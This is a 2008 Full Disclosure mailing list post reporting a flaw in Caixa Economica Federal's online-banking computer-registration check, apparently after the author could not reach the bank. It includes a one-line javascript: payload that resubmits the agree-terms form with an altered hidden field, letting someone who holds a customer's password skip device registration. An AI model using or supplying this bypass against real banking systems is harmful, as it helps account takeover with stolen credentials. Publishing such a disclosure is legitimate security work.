Full Disclosure mailing list archives
Brazilian Bank (Caixa Economica Federal) vuln
From: "H2G-Labs Information Security" <h2glabs.infosec () gmail com>
Date: Thu, 19 Jun 2008 10:43:08 -0300
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Hi folks,

Some Brazilian banks have been implementing a system based on computer identification (like a PC registration). The system has some vulns and can be easily exploited. I am trying to contact Caixa Economica Federal (http://www.caixa.gov.br) without success.

If the attacker has the USERNAME and PASSWORD of the user account, the attacker can log in to the bank account without identifying the computer. To do this, after entering the USERNAME and PASSWORD of the account, put this code in the browser (on the agree-terms page):

javascript:document.forms[0].onsubmit='';document.forms[0].navegacao.value='16';document.forms[0].submit();void(0);

And you will be logged in, without needing to register/identify your machine.

I hope the CAIXA team solves this problem in a hurry.

Sorry for my bad English, I am Brazilian.

Regards...

- --
H2G-Labs Information Security
Igor Marcel - Information Security Consultant
H2GLabs.InfoSec "at" Gmail.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG (PRIVATE)
Comment: H2G-Labs Information Security

iQIVAwUBSFpijMJBTfehHgWwAQp0ZBAAjpHW3keLOAuPvF91Jb8JSktRWgRy+q5p
PnhuiDXMaflWSUSVWQic24BStRYGv3RXCK8OKQdVMhVwcfG8LIFBWndYopwKUDx3
esGjTMZBuwoGnT3kIOjpFsygucGY89rNePfNduoJDY8NGeQCWe04TbzkeR1xUliT
LHqd3rpsgvd6p7jQu9/Ai1+1BDAi9p34toAxGm5RzfXNzr69DT6Jkuq8mSfGnPiZ
+roQEXI/6JQNoZhhWKYCGlwzXVFyQUCZVQ7IgcqjL+0RtsmhkGpw2VlG4enIY4UZ
eqo1eqZdsFmooHnMgDnorR8OQQrq+/20JbFy3pVBoOfh/9HPntFYZnBJVTRqGGKL
Tt9LzlQz5eMpLE2c74nz0b5FeSOLFoKyT/eyzX0R5yfLiVH7BKaa4egejjZcjXwh
Vtv6L0BL67iAmL7iTQiJ9EjOY2PFKmSsdwpEOv8iCbzk6rK0p0JKKBjrRN1OT4e2
02yVvzglDoLJymPwHtuQDudwPnJ1lTJE3+5gK0pUWfWxhqe/Rq7u6J4f1Cs7N05r
aSaSQFlklarsi7xs3IQPlICejMq0dEcGlmnsXbD9XGurSt9KBeRO55wkAaA5p7T7
ncyEsfEidFEl5fQstVuuvG9Gf+94Q64Skluq8+e6awJXc1nf1xT0O4hJErQhzg4u
HVP+cm14G8A=
=wJAX
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Brazilian Bank (Caixa Economica Federal) vuln H2G-Labs Information Security (Jun 19)
- <Possible follow-ups>
- Re: Brazilian Bank (Caixa Economica Federal) vuln H2G-Labs Information Security (Jun 20)